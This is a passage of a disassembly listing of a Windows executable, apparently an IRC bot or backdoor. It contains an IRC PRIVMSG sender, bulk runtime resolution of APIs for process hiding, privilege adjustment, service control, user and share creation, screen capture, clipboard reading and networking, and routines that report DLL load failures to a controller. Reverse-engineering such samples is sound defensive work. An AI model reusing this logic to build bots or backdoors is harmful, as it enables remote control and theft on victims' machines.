mov edi, offset aPrivmsg ; "PRIVMSG"
loc_4056DA: ; CODE XREF: sub_4056BF+14�j
mov eax, edi
lea edx, [eax+1]
loc_4056DF: ; CODE XREF: sub_4056BF+25�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4056DF
sub eax, edx
mov esi, eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_4056F0: ; CODE XREF: sub_4056BF+36�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4056F0
push [ebp+arg_8]
sub eax, ecx
mov ecx, 1FAh
sub ecx, eax
push offset aS_2 ; "%s"
sub ecx, esi
push ecx
lea eax, [ebp+var_400]
push eax
call sub_41466D
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_414415
add esp, 24h
lea eax, [ebp+var_200]
pop edi
lea ecx, [eax+1]
pop esi
loc_405741: ; CODE XREF: sub_4056BF+87�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405741
push 0
sub eax, ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43589C ; send
cmp [ebp+arg_10], 0
jz short locret_40576E
push 0FAh
call ds:dword_420000 ; Sleep
locret_40576E: ; CODE XREF: sub_4056BF+A2�j
leave
retn
sub_4056BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405770 proc near ; CODE XREF: sub_40E6BB+4B�p
push ebx
push ebp
mov ebp, ds:dword_4200A4
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_420084
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_405890
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4357E0, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4357F8, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_435854, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4357B8, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_435820, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_435804, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4358A4, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_435794, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_435828, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_43584C, eax
call esi ; GetProcAddress
cmp dword_4357E0, ebx
mov dword_4358B0, eax
jz short loc_40586E
cmp dword_4357F8, ebx
jz short loc_40586E
cmp dword_435854, ebx
jz short loc_40586E
cmp dword_4357B8, ebx
jz short loc_40586E
cmp dword_435804, ebx
jz short loc_40586E
cmp dword_4358A4, ebx
jz short loc_40586E
cmp dword_435794, ebx
jz short loc_40586E
cmp dword_435828, ebx
jz short loc_40586E
cmp dword_43584C, ebx
jz short loc_40586E
cmp eax, ebx
jnz short loc_405878
loc_40586E: ; CODE XREF: sub_405770+B8�j
; sub_405770+C0�j ...
mov dword_435958, 1
loc_405878: ; CODE XREF: sub_405770+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_435904, eax
jz short loc_4058A5
push 1
push ebx
call eax
jmp short loc_4058A5
; ---------------------------------------------------------------------------
loc_405890: ; CODE XREF: sub_405770+1D�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43595C, eax
mov dword_435958, 1
loc_4058A5: ; CODE XREF: sub_405770+117�j
; sub_405770+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_420088 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405960
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4358C8, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_435860, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_43579C, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_435800, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4357B4, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_435934, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_435798, eax
call esi ; GetProcAddress
cmp dword_4358C8, ebx
mov dword_4358A0, eax
jz short loc_40596B
cmp dword_435860, ebx
jz short loc_40596B
cmp dword_43579C, ebx
jz short loc_40596B
cmp dword_435800, ebx
jz short loc_40596B
cmp dword_4357B4, ebx
jz short loc_40596B
cmp dword_435934, ebx
jz short loc_40596B
cmp dword_435798, ebx
jz short loc_40596B
cmp eax, ebx
jnz short loc_405975
jmp short loc_40596B
; ---------------------------------------------------------------------------
loc_405960: ; CODE XREF: sub_405770+144�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435964, eax
loc_40596B: ; CODE XREF: sub_405770+1B8�j
; sub_405770+1C0�j ...
mov dword_435960, 1
loc_405975: ; CODE XREF: sub_405770+1EC�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_405B10
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_435930, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_435850, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_4357EC, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_4357C8, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_435844, eax
call esi ; GetProcAddress
cmp dword_435930, ebx
mov dword_4358E4, eax
jz short loc_405A00
cmp dword_435850, ebx
jz short loc_405A00
cmp dword_4357EC, ebx
jz short loc_405A00
cmp dword_4357C8, ebx
jz short loc_405A00
cmp dword_435844, ebx
jz short loc_405A00
cmp eax, ebx
jnz short loc_405A0A
loc_405A00: ; CODE XREF: sub_405770+26A�j
; sub_405770+272�j ...
mov dword_435968, 1
loc_405A0A: ; CODE XREF: sub_405770+28E�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_43593C, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_435924, eax
call esi ; GetProcAddress
cmp dword_43593C, ebx
mov dword_435870, eax
jz short loc_405A45
cmp dword_435924, ebx
jz short loc_405A45
cmp eax, ebx
jnz short loc_405A4F
loc_405A45: ; CODE XREF: sub_405770+2C7�j
; sub_405770+2CF�j
mov dword_435968, 1
loc_405A4F: ; CODE XREF: sub_405770+2D3�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_4358C4, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_435940, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_4358CC, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4358E8, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4357FC, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_435838, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_4358D4, eax
call esi ; GetProcAddress
cmp dword_4358C4, ebx
mov dword_435900, eax
jz short loc_405AF3
cmp dword_435940, ebx
jz short loc_405AF3
cmp dword_4358CC, ebx
jz short loc_405AF3
cmp dword_4358E8, ebx
jz short loc_405AF3
cmp dword_4357FC, ebx
jz short loc_405AF3
cmp dword_435838, ebx
jz short loc_405AF3
cmp dword_4358D4, ebx
jz short loc_405AF3
cmp eax, ebx
jnz short loc_405AFD
loc_405AF3: ; CODE XREF: sub_405770+34D�j
; sub_405770+355�j ...
mov dword_435968, 1
loc_405AFD: ; CODE XREF: sub_405770+381�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_435898, eax
jnz short loc_405B25
jmp short loc_405B1B
; ---------------------------------------------------------------------------
loc_405B10: ; CODE XREF: sub_405770+210�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43596C, eax
loc_405B1B: ; CODE XREF: sub_405770+39E�j
mov dword_435968, 1
loc_405B25: ; CODE XREF: sub_405770+39C�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_405BF1
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_435944, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov dword_435918, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov dword_435880, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov dword_435878, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov dword_4358BC, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov dword_4357A4, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov dword_435890, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov dword_435834, eax
call esi ; GetProcAddress
cmp dword_435944, ebx
mov dword_435884, eax
jz short loc_405BFC
cmp dword_435918, ebx
jz short loc_405BFC
cmp dword_435880, ebx
jz short loc_405BFC
cmp dword_435878, ebx
jz short loc_405BFC
cmp dword_4358BC, ebx
jz short loc_405BFC
cmp dword_4357A4, ebx
jz short loc_405BFC
cmp dword_435890, ebx
jz short loc_405BFC
cmp dword_435834, ebx
jz short loc_405BFC
cmp eax, ebx
jnz short loc_405C06
jmp short loc_405BFC
; ---------------------------------------------------------------------------
loc_405BF1: ; CODE XREF: sub_405770+3C0�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435974, eax
loc_405BFC: ; CODE XREF: sub_405770+441�j
; sub_405770+449�j ...
mov dword_435970, 1
loc_405C06: ; CODE XREF: sub_405770+47D�j
mov ebp, ds:dword_420088
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405EC2
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov dword_435818, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov dword_43578C, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov dword_435894, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov dword_43585C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov dword_4358DC, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov dword_4358C0, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov dword_435920, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov dword_435808, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov dword_4357AC, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov dword_4357C0, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov dword_435888, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov dword_43587C, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov dword_435954, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov dword_43592C, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov dword_4358FC, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov dword_4358D8, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov dword_43589C, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov dword_4357D8, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov dword_43577C, eax
call esi ; GetProcAddress
mov dword_4357A0, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov dword_4358E0, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov dword_4358AC, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov dword_435928, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov dword_4357CC, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov dword_435824, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov dword_435780, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov dword_43591C, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov dword_435868, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov dword_4358F8, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov dword_435848, eax
call esi ; GetProcAddress
cmp dword_435818, ebx
mov dword_435914, eax
jz loc_405ECD
cmp dword_43578C, ebx
jz loc_405ECD
cmp dword_435894, ebx
jz loc_405ECD
cmp dword_4358DC, ebx
jz loc_405ECD
cmp dword_4358C0, ebx
jz loc_405ECD
cmp dword_435920, ebx
jz loc_405ECD
cmp dword_435808, ebx
jz loc_405ECD
cmp dword_4357AC, ebx
jz loc_405ECD
cmp dword_4357C0, ebx
jz loc_405ECD
cmp dword_435888, ebx
jz loc_405ECD
cmp dword_43587C, ebx
jz loc_405ECD
cmp dword_435954, ebx
jz loc_405ECD
cmp dword_43592C, ebx
jz loc_405ECD
cmp dword_4358FC, ebx
jz short loc_405ECD
cmp dword_43589C, ebx
jz short loc_405ECD
cmp dword_4357D8, ebx
jz short loc_405ECD
cmp dword_43577C, ebx
jz short loc_405ECD
cmp dword_4357A0, ebx
jz short loc_405ECD
cmp dword_4358E0, ebx
jz short loc_405ECD
cmp dword_4358AC, ebx
jz short loc_405ECD
cmp dword_435928, ebx
jz short loc_405ECD
cmp dword_4357CC, ebx
jz short loc_405ECD
cmp dword_435824, ebx
jz short loc_405ECD
cmp dword_435780, ebx
jz short loc_405ECD
cmp dword_43591C, ebx
jz short loc_405ECD
cmp dword_435868, ebx
jz short loc_405ECD
cmp dword_4358F8, ebx
jz short loc_405ECD
cmp eax, ebx
jnz short loc_405ED7
jmp short loc_405ECD
; ---------------------------------------------------------------------------
loc_405EC2: ; CODE XREF: sub_405770+4A7�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43597C, eax
loc_405ECD: ; CODE XREF: sub_405770+646�j
; sub_405770+652�j ...
mov dword_435978, 1
loc_405ED7: ; CODE XREF: sub_405770+74E�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_405FDC
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov dword_435790, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov dword_435950, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov dword_435830, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov dword_43594C, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov dword_43583C, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov dword_4357B0, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov dword_435810, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov dword_435788, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov dword_4358B4, eax
call esi ; GetProcAddress
cmp dword_435790, ebx
mov ecx, dword_4357B0
mov dword_435864, eax
jz short loc_405FB8
cmp dword_435950, ebx
jz short loc_405FB8
cmp dword_435830, ebx
jz short loc_405FB8
cmp dword_43594C, ebx
jz short loc_405FB8
cmp dword_43583C, ebx
jz short loc_405FB8
cmp ecx, ebx
jz short loc_405FB8
cmp dword_435810, ebx
jz short loc_405FB8
cmp dword_435788, ebx
jz short loc_405FB8
cmp dword_4358B4, ebx
jz short loc_405FB8
cmp eax, ebx
jnz short loc_405FC2
loc_405FB8: ; CODE XREF: sub_405770+806�j
; sub_405770+80E�j ...
mov dword_435980, 1
loc_405FC2: ; CODE XREF: sub_405770+846�j
cmp ecx, ebx
jz short loc_405FF7
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov dword_435948, eax
jnz short loc_405FF7
jmp short loc_405FF1
; ---------------------------------------------------------------------------
loc_405FDC: ; CODE XREF: sub_405770+772�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435984, eax
mov dword_435980, 1
loc_405FF1: ; CODE XREF: sub_405770+86A�j
mov dword_435948, ebx
loc_405FF7: ; CODE XREF: sub_405770+854�j
; sub_405770+868�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406041
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov dword_435858, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov dword_43588C, eax
call esi ; GetProcAddress
cmp dword_435858, ebx
mov dword_4358F0, eax
jz short loc_40604C
cmp dword_43588C, ebx
jz short loc_40604C
cmp eax, ebx
jnz short loc_406056
jmp short loc_40604C
; ---------------------------------------------------------------------------
loc_406041: ; CODE XREF: sub_405770+892�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43598C, eax
loc_40604C: ; CODE XREF: sub_405770+8C1�j
; sub_405770+8C9�j ...
mov dword_435988, 1
loc_406056: ; CODE XREF: sub_405770+8CD�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40614C
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov dword_4357F0, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov dword_43580C, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov dword_435908, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov dword_4357BC, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov dword_435840, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov dword_435784, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov dword_4357D4, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov dword_4358D0, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov dword_4357E8, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov dword_4357F4, eax
call esi ; GetProcAddress
cmp dword_4357F0, ebx
mov dword_43581C, eax
jz short loc_406157
cmp dword_43580C, ebx
jz short loc_406157
cmp dword_435908, ebx
jz short loc_406157
cmp dword_4357BC, ebx
jz short loc_406157
cmp dword_435840, ebx
jz short loc_406157
cmp dword_435784, ebx
jz short loc_406157
cmp dword_4357D4, ebx
jz short loc_406157
cmp dword_4358D0, ebx
jz short loc_406157
cmp dword_4357E8, ebx
jz short loc_406157
cmp dword_4357F4, ebx
jz short loc_406157
cmp eax, ebx
jnz short loc_406161
jmp short loc_406157
; ---------------------------------------------------------------------------
loc_40614C: ; CODE XREF: sub_405770+8F1�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_435994, eax
loc_406157: ; CODE XREF: sub_405770+98C�j
; sub_405770+994�j ...
mov dword_435990, 1
loc_406161: ; CODE XREF: sub_405770+9D8�j
push offset aDnsapi_dll ; "dnsapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406196
push offset aDnsflushresolv ; "DnsFlushResolverCache"
push edi
call esi ; GetProcAddress
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push edi
mov dword_4358EC, eax
call esi ; GetProcAddress
cmp dword_4358EC, ebx
mov dword_43586C, eax
jz short loc_4061A1
cmp eax, ebx
jnz short loc_4061AB
jmp short loc_4061A1
; ---------------------------------------------------------------------------
loc_406196: ; CODE XREF: sub_405770+9FC�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_43599C, eax
loc_4061A1: ; CODE XREF: sub_405770+A1E�j
; sub_405770+A24�j
mov dword_435998, 1
loc_4061AB: ; CODE XREF: sub_405770+A22�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4061E0
push offset aGetipnettable ; "GetIpNetTable"
push edi
call esi ; GetProcAddress
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push edi
mov dword_435814, eax
call esi ; GetProcAddress
cmp dword_435814, ebx
mov dword_435874, eax
jz short loc_4061EB
cmp eax, ebx
jnz short loc_4061F5
jmp short loc_4061EB
; ---------------------------------------------------------------------------
loc_4061E0: ; CODE XREF: sub_405770+A46�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_4359A4, eax
loc_4061EB: ; CODE XREF: sub_405770+A68�j
; sub_405770+A6E�j
mov dword_4359A0, 1
loc_4061F5: ; CODE XREF: sub_405770+A6C�j
push offset aMpr_dll ; "mpr.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_406254
push offset aWnetaddconnect ; "WNetAddConnection2A"
push edi
call esi ; GetProcAddress
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push edi
mov dword_4358A8, eax
call esi ; GetProcAddress
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push edi
mov dword_435938, eax
call esi ; GetProcAddress
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push edi
mov dword_4357E4, eax
call esi ; GetProcAddress
cmp dword_4358A8, ebx
mov dword_4357A8, eax
jz short loc_40625F
cmp dword_435938, ebx
jz short loc_40625F
cmp dword_4357E4, ebx
jz short loc_40625F
cmp eax, ebx
jnz short loc_406269
jmp short loc_40625F
; ---------------------------------------------------------------------------
loc_406254: ; CODE XREF: sub_405770+A90�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_4359AC, eax
loc_40625F: ; CODE XREF: sub_405770+ACC�j
; sub_405770+AD4�j ...
mov dword_4359A8, 1
loc_406269: ; CODE XREF: sub_405770+AE0�j
push offset aShell32_dll ; "shell32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40629E
push offset aShellexecutea ; "ShellExecuteA"
push edi
call esi ; GetProcAddress
push offset aShchangenotify ; "SHChangeNotify"
push edi
mov dword_435910, eax
call esi ; GetProcAddress
cmp dword_435910, ebx
mov dword_4357DC, eax
jz short loc_4062A9
cmp eax, ebx
jnz short loc_4062B3
jmp short loc_4062A9
; ---------------------------------------------------------------------------
loc_40629E: ; CODE XREF: sub_405770+B04�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_4359B4, eax
loc_4062A9: ; CODE XREF: sub_405770+B26�j
; sub_405770+B2C�j
mov dword_4359B0, 1
loc_4062B3: ; CODE XREF: sub_405770+B2A�j
push offset aOdbc32_dll ; "odbc32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_40633C
push offset aSqldriverconne ; "SQLDriverConnect"
push edi
call esi ; GetProcAddress
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push edi
mov dword_4358F4, eax
call esi ; GetProcAddress
push offset aSqlexecdirect ; "SQLExecDirect"
push edi
mov dword_4357C4, eax
call esi ; GetProcAddress
push offset aSqlallochandle ; "SQLAllocHandle"
push edi
mov dword_43590C, eax
call esi ; GetProcAddress
push offset aSqlfreehandle ; "SQLFreeHandle"
push edi
mov dword_43582C, eax
call esi ; GetProcAddress
push offset aSqldisconnect ; "SQLDisconnect"
push edi
mov dword_4358B8, eax
call esi ; GetProcAddress
cmp dword_4358F4, ebx
mov dword_4357D0, eax
jz short loc_406347
cmp dword_4357C4, ebx
jz short loc_406347
cmp dword_43590C, ebx
jz short loc_406347
cmp dword_43582C, ebx
jz short loc_406347
cmp dword_4358B8, ebx
jz short loc_406347
cmp eax, ebx
jnz short loc_406351
jmp short loc_406347
; ---------------------------------------------------------------------------
loc_40633C: ; CODE XREF: sub_405770+B4E�j
call ds:dword_420008 ; RtlGetLastWin32Error
mov dword_4359BC, eax
loc_406347: ; CODE XREF: sub_405770+BA4�j
; sub_405770+BAC�j ...
mov dword_4359B8, 1
loc_406351: ; CODE XREF: sub_405770+BC8�j
pop edi
pop esi
xor eax, eax
pop ebp
inc eax
pop ebx
retn
sub_405770 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406359 proc near ; CODE XREF: sub_4089DC+4684�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_4]
push esi
xor esi, esi
cmp dword_435958, esi
push edi
mov edi, [ebp+arg_8]
jz short loc_4063A1
push dword_43595C
lea eax, [ebp+var_200]
push offset aKernel32_dllFa ; "Kernel32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4063A1: ; CODE XREF: sub_406359+1A�j
cmp dword_435960, esi
jz short loc_4063D5
push dword_435964
lea eax, [ebp+var_200]
push offset aUser32_dllFail ; "User32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4063D5: ; CODE XREF: sub_406359+4E�j
cmp dword_435968, esi
jz short loc_406409
push dword_43596C
lea eax, [ebp+var_200]
push offset aAdvapi32_dllFa ; "Advapi32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_406409: ; CODE XREF: sub_406359+82�j
cmp dword_435970, esi
jz short loc_40643D
push dword_435974
lea eax, [ebp+var_200]
push offset aGdi32_dllFaile ; "Gdi32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_40643D: ; CODE XREF: sub_406359+B6�j
cmp dword_435978, esi
jz short loc_406471
push dword_43597C
lea eax, [ebp+var_200]
push offset aWs2_32_dllFail ; "Ws2_32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_406471: ; CODE XREF: sub_406359+EA�j
cmp dword_435980, esi
jz short loc_4064A5
push dword_435984
lea eax, [ebp+var_200]
push offset aWininet_dllFai ; "Wininet.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4064A5: ; CODE XREF: sub_406359+11E�j
cmp dword_435988, esi
jz short loc_4064D9
push dword_43598C
lea eax, [ebp+var_200]
push offset aIcmp_dllFailed ; "Icmp.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4064D9: ; CODE XREF: sub_406359+152�j
cmp dword_435990, esi
jz short loc_40650D
push dword_435994
lea eax, [ebp+var_200]
push offset aNetapi32_dllFa ; "Netapi32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_40650D: ; CODE XREF: sub_406359+186�j
cmp dword_435998, esi
jz short loc_406541
push dword_43599C
lea eax, [ebp+var_200]
